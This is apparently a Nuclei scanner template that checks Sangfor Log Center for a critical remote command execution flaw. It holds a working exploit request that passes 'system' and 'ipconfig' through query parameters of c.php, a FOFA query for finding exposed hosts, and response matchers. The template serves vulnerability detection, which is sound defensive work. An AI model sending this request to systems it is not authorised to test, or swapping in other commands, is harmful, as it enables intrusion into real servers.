id: sangfor-cphp-rce

info:
  name: Sangfor Log Center - Remote Command Execution
  author: DhiyaneshDk
  severity: critical
  description: Sangfor Log Center is vulnerable to RCE.
  reference:
    - https://github.com/Threekiii/Awesome-POC/blob/master/Web%E5%BA%94%E7%94%A8%E6%BC%8F%E6%B4%9E/%E6%B7%B1%E4%BF%A1%E6%9C%8D%20%E6%97%A5%E5%BF%97%E4%B8%AD%E5%BF%83%20c.php%20%E8%BF%9C%E7%A8%8B%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E.md?plain=1
  metadata:
    verified: true
    max-request: 1
    fofa-query: "isHighPerformance : !!SFIsHighPerformance"
  tags: sangfor,rce

http:
  - method: GET
    path:
      - "{{BaseURL}}/tool/log/c.php?strip_slashes=system&host=ipconfig"

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "Windows IP"
          - "Log Helper"
        condition: and

      - type: status
        status:
          - 200
# digest: 4a0a00473045022100ddbbc244a81a00988650739cf891e7fef8efc35cee736cfd50530901f1449901022016fa8e155f31afa7384c9759368a442d5126ef99572f7152ab4c177157a8a82d:922c64590222798bb761d5b6d8e72950